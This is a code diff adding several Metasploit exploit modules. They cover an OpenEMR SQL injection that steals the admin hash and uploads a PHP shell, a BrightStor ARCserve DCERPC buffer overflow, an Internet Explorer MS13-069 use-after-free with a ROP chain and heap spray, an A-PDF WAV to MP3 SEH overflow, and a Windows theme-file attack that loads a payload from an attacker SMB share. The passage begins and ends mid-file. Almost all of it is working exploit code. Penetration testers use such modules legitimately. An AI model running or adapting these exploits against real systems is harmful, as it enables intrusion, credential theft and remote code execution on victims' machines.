+    # If the server returns 200 we assume we uploaded the malicious
+    # file successfully
+    if not res or res.code != 200
+      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
+    end
+
+    register_files_for_cleanup("/tmp/ApplianceUpdate")
+
+    print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },
+      'uri'    => normalize_uri(uri)
+    })
+
+    # If we don't get a 200 when we request our malicious payload, we suspect
+    # we don't have a shell, either.
+    if res and res.code != 200
+      print_error("#{peer} - Unexpected response, probably the exploit failed")
+    end
+
+	end
+
+end
@@ -0,0 +1,187 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability found in OpenEMR version 4.1.1 Patch 14 and lower.
+        When logging in as any non-admin user, it's possible to retrieve the admin SHA1 password
+        hash from the database through SQL injection. The SQL injection vulnerability exists
+        in the "new_comprehensive_save.php" page. This hash can be used to log in as the admin
+        user. After logging in, the "manage_site_files.php" page will be used to upload arbitrary
+        code.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
+        ],
+      'References'     =>
+        [
+          ['OSVDB', '97482'],
+          ['EDB', '28329']
+        ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['OpenEMR', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 16 2013",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to the OpenEMR installation', '/openemr']),
+          OptString.new('USER', [true, 'The non-admin user', '']),
+          OptString.new('PASS', [true, 'The non-admin password', ''])
+        ], self.class)
+  end
+
+  def peer
+    return "#{rhost}:#{rport}"
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    # Check version
+    print_status("#{peer} - Trying to detect installed version")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "interface", "login", "login.php")
+    })
+
+    if res and res.code == 200 and res.body =~ /v(\d+.\d+.\d+)/
+      version = $1
+    else
+      return Exploit::CheckCode::Unknown
+    end
+
+    print_status("#{peer} - Version #{version} detected")
+
+    if version < "4.1.2"
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def login(base, name, pass)
+    #print_status("#{peer} - Logging in as non-admin user [ #{datastore['USER']} ]")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri("#{base}", "interface", "main", "main_screen.php"),
+      'vars_get' => {
+          "auth" => "login",
+          "site" => "default"
+      },
+      'vars_post' => {
+        'authProvider' => 'Default',
+        'authUser' => "#{name}",
+        'authPass' => "#{pass}"
+        }
+    })
+
+    if res && res.code == 200 and res.headers['Set-Cookie'] =~ /OpenEMR=([a-zA-Z0-9]+)/
+      session = $1
+      print_status("#{rhost}:#{rport} - Login successful")
+      print_status("#{rhost}:#{rport} - Session cookie is [ #{session} ]")
+      return session
+    else
+      fail_with(Failure::Unknown, "#{peer} - Login was not succesful!")
+    end
+  end
+
+  def exploit
+    # Password should be converted to a SHA1 hash
+    password = Rex::Text.sha1(datastore['PASS'])
+
+    # Login as non-admin
+    cookie = login(uri, datastore['USER'], password)
+
+    sqlq = rand_text_alpha(8)
+    # Generate random string and convert to hex
+    sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
+
+    # Our SQL Error-Based Injection string - The string will return the admin password hash between the words ABCD<hash>ABCD in the response page.
+    sqli = "1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) "
+    sqli << "FROM users WHERE username = 0x61646d696e LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '#{sqlq}'='#{sqlq}"
+
+    post_data = "form_pubpid=#{sqli}"
+    print_status("#{peer} - Retrieving admin password hash through SQLi")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'data'   => post_data,
+      'cookie' => "OpenEMR=#{cookie}",
+      'uri'    => normalize_uri(uri, "interface", "new", "new_comprehensive_save.php")
+    })
+
+    if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/
+      adminhash = $1
+      print_status("#{peer} - Admin password hash is [ #{adminhash} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Retrieving admin password failed!")
+    end
+
+    # Login as admin and retrieve cookie
+    cookie = login(uri, "admin", "#{adminhash}")
+
+    # Random filename
+    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("", nil, nil, "form-data; name=\"bn_save\"")
+    post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"form_image\"; filename=\"#{payload_name}\"")
+    file = post_data.to_s
+    file.strip!
+
+    print_status("#{peer} - Uploading shell [ #{payload_name} ]")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, "interface", "super", "manage_site_files.php"),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => "OpenEMR=#{cookie}",
+      'data'   => file
+    })
+
+    # If the server returns 200 and the body contains our payload name,
+    # we assume we uploaded the malicious file successfully
+    if not res or res.code != 200 or res.body !~ /#{payload_name}/
+      fail_with(Failure::Unknown, "#{peer} - File wasn't uploaded, aborting!")
+    end
+
+    register_file_for_cleanup(payload_name)
+
+    print_status("#{peer} - Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "sites", "default", "images", "#{payload_name}")
+    })
+
+    # If we don't get a 200 when we request our malicious payload, we suspect
+    # we don't have a shell, either.
+    if res and res.code != 200
+      print_error("#{peer} - Unexpected response, exploit probably failed!")
+    end
+
+  end
+
+end
@@ -0,0 +1,92 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::DCERPC
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
+        r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
+        the buffer and execute arbitrary code.
+      },
+      'Author'         => [ 'MC' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'OSVDB', '68330'],
+          [ 'URL', 'http://www.metasploit.com/users/mc' ],
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'    => 500,
+          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
+          'StackAdjustment' => -3500,
+        },
+      'Platform' => 'win',
+      'Targets'  =>
+        [
+          [ 'BrightStor ARCserve r11.5/Windows 2003',     { 'Ret' => 0x28eb6493 } ],
+        ],
+      'DisclosureDate' => 'Oct 4 2010',
+      'DefaultTarget'  => 0))
+
+    register_options([ Opt::RPORT(6502) ], self.class)
+  end
+
+  def exploit
+
+    connect
+
+    handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
+    print_status("Binding to #{handle} ...")
+
+    dcerpc_bind(handle)
+    print_status("Bound to #{handle} ...")
+
+    request =  "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
+    request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+    dcerpc.call(0x2B, request)
+
+    sploit =  NDR.long(4)
+    sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
+
+    print_status("Trying target #{target.name}...")
+
+      begin
+        dcerpc_call(0x8A, sploit)
+        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+      end
+
+    handler
+    disconnect
+
+  end
+
+end
+=begin
+/* opcode: 0x8A, address: 0x100707D0 */
+
+long   sub_100707D0 (
+ [in] handle_t  arg_1,
+ [in] long  arg_2,
+ [in][ref][string] char * arg_3
+);
+=end
@@ -12,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
+  include Msf::Module::Deprecated
+  deprecated Date.new(2013, 10, 2), "exploit/windows/brightstor/tape_engine_0x8a"

  def initialize(info = {})
    super(update_info(info,
@@ -0,0 +1,274 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free",
+      'Description'    => %q{
+        This module exploits a use-after-free vulnerability found in Internet Explorer,
+        specifically in how the browser handles the caret (text cursor) object. In IE's standards
+        mode, the caret handling's vulnerable state can be triggered by first setting up an
+        editable page with an input field, and then we can force the caret to update in an
+        onbeforeeditfocus event by setting the body's innerHTML property. In this event handler,
+        mshtml!CCaret::`vftable' can be freed using a document.write() function, however,
+        mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the
+        same reference to the CCaret object. When the function tries to use this invalid reference
+        to call a virtual function at offset 0x2c, it finally results a crash. Precise control of
+        the freed object allows arbitrary code execution under the context of the user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'corelanc0d3r', # Vuln discovery & PoC (@corelanc0d3r)
+          'sinn3r'        # Metasploit           (@_sinn3r)
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-3205' ],
+          [ 'OSVDB', '97094' ],
+          [ 'MSB', 'MS13-069'  ],
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-217/' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [
+            # Win 7 target on hold until we have a stable custom spray for it
+            'IE 8 on Windows XP SP3',
+            {
+              'Rop'         => :msvcrt,
+              'TargetAddr'  => 0x1ec20101, # Allocs @ 1ec20020 (+0xe1 bytes to be null-byte free) - in ecx
+              'PayloadAddr' => 0x1ec20105, # where the ROP payload begins
+              'Pivot'       => 0x77C4FA1A, # mov esp,ebx; pop ebx; ret
+              'PopESP'      => 0x77C37422, # pop esp; ret (pivot to a bigger space)
+              'Align'       => 0x77c4d801  # add esp, 0x2c; ret (ROP gadget to jmp over pivot gadget)
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          # Our property sprays dislike null bytes
+          'BadChars' => "\x00",
+          # Fix the stack again before the payload is executed.
+          # If we don't do this, meterpreter fails due to a bad socket.
+          'Prepend'        => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+                              "\x83\xC0\x08"             + # add eax, byte 8
+                              "\x8b\x20"                 + # mov esp, [eax]
+                              "\x81\xC4\x30\xF8\xFF\xFF",  # add esp, -2000
+          # Fall back to the previous allocation so we have plenty of space
+          # for the decoder to use
+          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff"   # add esp, -80000
+
+        },
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f'
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 10 2013",
+      'DefaultTarget'  => 0))
+  end
+
+
+  def get_target(agent)
+    return target if target.name != 'Automatic'
+
+    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+    ie_name = "IE #{ie}"
+
+    case nt
+    when '5.1'
+      os_name = 'Windows XP SP3'
+    end
+
+    targets.each do |t|
+      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+        return t
+      end
+    end
+
+    nil
+  end
+
+
+  def get_payload(t)
+      rop =
+      [
+        0x77c1e844, # POP EBP # RETN [msvcrt.dll]
+        0x77c1e844, # skip 4 bytes [msvcrt.dll]
+        0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
+        0xffffffff,
+        0x77c127e5, # INC EBX # RETN [msvcrt.dll]
+        0x77c127e5, # INC EBX # RETN [msvcrt.dll]
+        0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
+        0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
+        0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
+        0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
+        0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
+        0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
+        0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
+        0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
+        0x77c3048a, # POP EDI # RETN [msvcrt.dll]
+        0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
+        0x77c46efb, # POP ESI # RETN [msvcrt.dll]
+        0x77c2aacc, # JMP [EAX] [msvcrt.dll]
+        0x77c3b860, # POP EAX # RETN [msvcrt.dll]
+        0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
+        0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
+        0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
+      ].pack("V*")
+
+    # This data should appear at the beginning of the target address (see TargetAddr in metadata)
+    p = ''
+    p << rand_text_alpha(225)                     # Padding to avoid null byte addr
+    p << [t['TargetAddr']].pack("V*")             # For mov ecx,dword ptr [eax]
+    p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr)
+    p << [t['Pivot']].pack("V*")                  # Stack pivot
+    p << rand_text_alpha(4)                       # Padding for the add esp,0x2c alignment
+    p << rop                                      # ROP chain
+    p << payload.encoded                          # Actual payload
+
+    return p
+  end
+
+
+  #
+  # Notes:
+  # * A custom spray is used (see function putPayload), because document.write() keeps freeing
+  #   our other sprays like js_property_spray or the heaplib + substring approach. This spray
+  #   seems unstable for Win 7, we'll have to invest more time on that.
+  # * Object size = 0x30
+  #
+  def get_html(t)
+    js_payload_addr = ::Rex::Text.to_unescape([t['PayloadAddr']].pack("V*"))
+    js_target_addr  = ::Rex::Text.to_unescape([t['TargetAddr']].pack("V*"))
+    js_pop_esp      = ::Rex::Text.to_unescape([t['PopESP']].pack("V*"))
+    js_payload      = ::Rex::Text.to_unescape(get_payload(t))
+    js_rand_dword   = ::Rex::Text.to_unescape(rand_text_alpha(4))
+
+    html = %Q|<!DOCTYPE html>
+    <html>
+    <head>
+    <script>
+    var freeReady = false;
+
+    function getObject() {
+      var obj = '';
+      for (i=0; i < 11; i++) {
+        if (i==1) {
+          obj += unescape("#{js_pop_esp}");
+        }
+        else if (i==2) {
+          obj += unescape("#{js_payload_addr}");
+        }
+        else if (i==3) {
+          obj += unescape("#{js_target_addr}");
+        }
+        else {
+          obj += unescape("#{js_rand_dword}");
+        }
+      }
+      obj += "\\u4545";
+      return obj;
+    }
+
+    function emptyAllocator(obj) {
+      for (var i = 0; i < 40; i++)
+      {
+        var e = document.createElement('div');
+        e.className = obj;
+      }
+    }
+
+    function spray(obj) {
+      for (var i = 0; i < 50; i++)
+      {
+        var e = document.createElement('div');
+        e.className = obj;
+        document.appendChild(e);
+      }
+    }
+
+    function putPayload() {
+      var p = unescape("#{js_payload}");
+      var block = unescape("#{js_rand_dword}");
+      while (block.length < 0x80000) block += block;
+      block = p + block.substring(0, (0x80000-p.length-6)/2);
+
+      for (var i = 0; i < 0x300; i++)
+      {
+        var e = document.createElement('div');
+        e.className = block;
+        document.appendChild(e);
+      }
+    }
+
+    function trigger() {
+      if (freeReady) {
+        var obj = getObject();
+        emptyAllocator(obj);
+        document.write("#{rand_text_alpha(1)}");
+        spray(obj);
+        putPayload();
+      }
+    }
+
+    window.onload = function() {
+      document.body.contentEditable = 'true';
+      document.execCommand('InsertInputPassword');
+      document.body.innerHTML = '#{rand_text_alpha(1)}';
+      freeReady = true;
+    }
+    </script>
+    </head>
+    <body onbeforeeditfocus="trigger()">
+    </body>
+    </html>
+    |
+
+    html.gsub(/^\x20\x20\x20\x20/, '')
+  end
+
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    t = get_target(agent)
+
+    unless t
+      print_error("Not a suitable target: #{agent}")
+      send_not_found(cli)
+      return
+    end
+
+    html = get_html(t)
+
+    print_status("Sending exploit...")
+    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
+  end
+
+end
+
+=begin
+
+In mshtml!CCaret::UpdateScreenCaret function:
+.text:63620F82                 mov     ecx, [eax]      ; crash
+.text:63620F84                 lea     edx, [esp+110h+var_A4]
+.text:63620F88                 push    edx
+.text:63620F89                 push    eax
+.text:63620F8A                 call    dword ptr [ecx+2Ch]
+  
+=end
@@ -12,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
+  include Msf::Module::Deprecated
+  deprecated Date.new(2013, 10, 2), "exploit/windows/fileformat/a_pdf_wav_to_mp3"

  def initialize(info = {})
    super(update_info(info,
@@ -0,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When
+        the application is used to import a specially crafted m3u file, a buffer overflow occurs
+        allowing arbitrary code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'd4rk-h4ck3r', # Original Exploit
+          'Dr_IDE',      # SEH Exploit
+          'dookie'       # MSF Module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '67241' ],
+          [ 'EDB', '14676' ],
+          [ 'EDB', '14681' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true',
+        },
+      'Payload'        =>
+        {
+          'Space'    => 600,
+          'BadChars' => "\x00\x0a",
+          'StackAdjustment' => -3500
+        },
+      'Platform' => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal', { 'Ret' => 0x0047265c, 'Offset' => 4132 } ],	# p/p/r in wavtomp3.exe
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Aug 17 2010',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
+      ], self.class)
+
+  end
+
+  def exploit
+
+    sploit = rand_text_alpha_upper(target['Offset'])
+    sploit << generate_seh_payload(target.ret)
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+    file_create(sploit)
+
+  end
+
+end
@@ -0,0 +1,434 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::SMBServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows
+        2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]
+        section. An arbitrary path can be used as screen saver, including a remote SMB resource,
+        which allows for remote code execution when a malicious .theme file is opened, and the
+        "Screen Saver" tab is viewed. The code execution is also triggered if the victim installs
+        the malicious theme and stays away from the computer, when Windows tries to display the
+        screensaver.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Eduardo Prado', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2013-0810'],
+          ['OSVDB', '97136'],
+          ['MSB', 'MS13-071'],
+          ['BID', '62176'],
+          ['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040']
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'false'
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Windows XP SP3 / Windows 2003 SP2', {}],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 10 2013",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
+          OptString.new('UNCPATH', [ false, 'Override the UNC path to use (Ex: \\\\192.168.1.1\\share\\exploit.scr)' ])
+        ], self.class)
+  end
+
+  def exploit
+
+    if (datastore['UNCPATH'])
+      @unc = datastore['UNCPATH']
+      print_status("Remember to share the malicious EXE payload as #{@unc}")
+    else
+      print_status("Generating our malicious executable...")
+      @exe = generate_payload_exe
+      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      @share = rand_text_alpha(5 + rand(5))
+      @scr_file = "#{rand_text_alpha(5 + rand(5))}.scr"
+      @hi, @lo = UTILS.time_unix_to_smb(Time.now.to_i)
+      @unc = "\\\\#{my_host}\\#{@share}\\#{@scr_file}"
+    end
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    # Default Windows XP / 2003 theme modified
+    theme = <<-EOF
+; Copyright (c) Microsoft Corp. 1995-2001
+
+[Theme]
+DisplayName=@themeui.dll,-2016
+
+; My Computer
+[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]
+DefaultValue=%WinDir%explorer.exe,0
+
+; My Documents
+[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]
+DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0
+
+; My Network Places
+[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]
+DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17
+
+; Recycle Bin
+[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]
+full=%WinDir%SYSTEM32\\shell32.dll,32
+empty=%WinDir%SYSTEM32\\shell32.dll,31
+
+[Control Panel\\Desktop]
+Wallpaper=
+TileWallpaper=0
+WallpaperStyle=2
+Pattern=
+ScreenSaveActive=0
+
+[boot]
+SCRNSAVE.EXE=#{@unc}
+
+[MasterThemeSelector]
+MTSM=DABJDKT
+    EOF
+    file_create(theme)
+    print_good("Let your victim open #{datastore['FILENAME']}")
+
+    if not datastore['UNCPATH']
+      print_status("Ready to deliver your payload on #{@unc}")
+      super
+    end
+
+  end
+
+  # TODO: these smb_* methods should be moved up to the SMBServer mixin
+  # development and test on progress
+
+  def smb_cmd_dispatch(cmd, c, buff)
+    smb = @state[c]
+    vprint_status("Received command #{cmd} from #{smb[:name]}")
+
+    pkt = CONST::SMB_BASE_PKT.make_struct
+    pkt.from_s(buff)
+    #Record the IDs
+    smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
+    smb[:user_id] = pkt['Payload']['SMB'].v['UserID']
+    smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID']
+    smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
+
+    case cmd
+      when CONST::SMB_COM_NEGOTIATE
+        smb_cmd_negotiate(c, buff)
+      when CONST::SMB_COM_SESSION_SETUP_ANDX
+        wordcount = pkt['Payload']['SMB'].v['WordCount']
+        if wordcount == 0x0D # It's the case for Share Security Mode sessions
+          smb_cmd_session_setup(c, buff)
+        else
+          vprint_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ")
+          smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS)
+        end
+      when CONST::SMB_COM_TRANSACTION2
+        smb_cmd_trans(c, buff)
+      when CONST::SMB_COM_NT_CREATE_ANDX
+        smb_cmd_create(c, buff)
+      when CONST::SMB_COM_READ_ANDX
+        smb_cmd_read(c, buff)
+      else
+        vprint_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})")
+        smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS)
+    end
+  end
+
+
+  def smb_cmd_negotiate(c, buff)
+    pkt = CONST::SMB_NEG_PKT.make_struct
+    pkt.from_s(buff)
+
+    dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/)
+
+    dialect = dialects.index("NT LM 0.12") || dialects.length-1
+
+    pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct
+    smb_set_defaults(c, pkt)
+
+    time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i)
+
+    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE
+    pkt['Payload']['SMB'].v['Flags1'] = 0x88
+    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+    pkt['Payload']['SMB'].v['WordCount'] = 17
+    pkt['Payload'].v['Dialect'] = dialect
+    pkt['Payload'].v['SecurityMode'] = 2 # SHARE Security Mode
+    pkt['Payload'].v['MaxMPX'] = 50
+    pkt['Payload'].v['MaxVCS'] = 1
+    pkt['Payload'].v['MaxBuff'] = 4356
+    pkt['Payload'].v['MaxRaw'] = 65536
+    pkt['Payload'].v['SystemTimeLow'] = time_lo
+    pkt['Payload'].v['SystemTimeHigh'] = time_hi
+    pkt['Payload'].v['ServerTimeZone'] = 0x0
+    pkt['Payload'].v['SessionKey'] = 0
+    pkt['Payload'].v['Capabilities'] = 0x80f3fd
+    pkt['Payload'].v['KeyLength'] = 8
+    pkt['Payload'].v['Payload'] = Rex::Text.rand_text_hex(8)
+
+    c.put(pkt.to_s)
+  end
+
+  def smb_cmd_session_setup(c, buff)
+
+    pkt = CONST::SMB_SETUP_RES_PKT.make_struct
+    smb_set_defaults(c, pkt)
+
+    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
+    pkt['Payload']['SMB'].v['Flags1'] = 0x88
+    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
+    pkt['Payload']['SMB'].v['WordCount'] = 3
+    pkt['Payload'].v['AndX'] = 0x75
+    pkt['Payload'].v['Reserved1'] = 00
+    pkt['Payload'].v['AndXOffset'] = 96
+    pkt['Payload'].v['Action'] = 0x1 # Logged in as Guest
+    pkt['Payload'].v['Payload'] =
+      Rex::Text.to_unicode("Unix", 'utf-16be') + "\x00\x00" + # Native OS # Samba signature
+      Rex::Text.to_unicode("Samba 3.4.7", 'utf-16be') + "\x00\x00" + # Native LAN Manager # Samba signature
+      Rex::Text.to_unicode("WORKGROUP", 'utf-16be') + "\x00\x00\x00" + # Primary DOMAIN # Samba signature
+    tree_connect_response = ""
+    tree_connect_response << [7].pack("C")  # Tree Connect Response : WordCount
+    tree_connect_response << [0xff].pack("C") # Tree Connect Response : AndXCommand
+    tree_connect_response << [0].pack("C") # Tree Connect Response : Reserved
+    tree_connect_response << [0].pack("v")  # Tree Connect Response : AndXOffset
+    tree_connect_response << [0x1].pack("v")  # Tree Connect Response : Optional Support
+    tree_connect_response << [0xa9].pack("v") # Tree Connect Response : Word Parameter
+    tree_connect_response << [0x12].pack("v")  # Tree Connect Response : Word Parameter
+    tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter
+    tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter
+    tree_connect_response << [13].pack("v") # Tree Connect Response : ByteCount
+    tree_connect_response << "A:\x00" # Service
+    tree_connect_response << "#{Rex::Text.to_unicode("NTFS")}\x00\x00" # Extra byte parameters
+    # Fix the Netbios Session Service Message Length
+    # to have into account the tree_connect_response,
+    # need to do this because there isn't support for
+    # AndX still
+    my_pkt = pkt.to_s + tree_connect_response
+    original_length = my_pkt[2, 2].unpack("n").first
+    original_length = original_length +  tree_connect_response.length
+    my_pkt[2, 2] = [original_length].pack("n")
+    c.put(my_pkt)
+  end
+
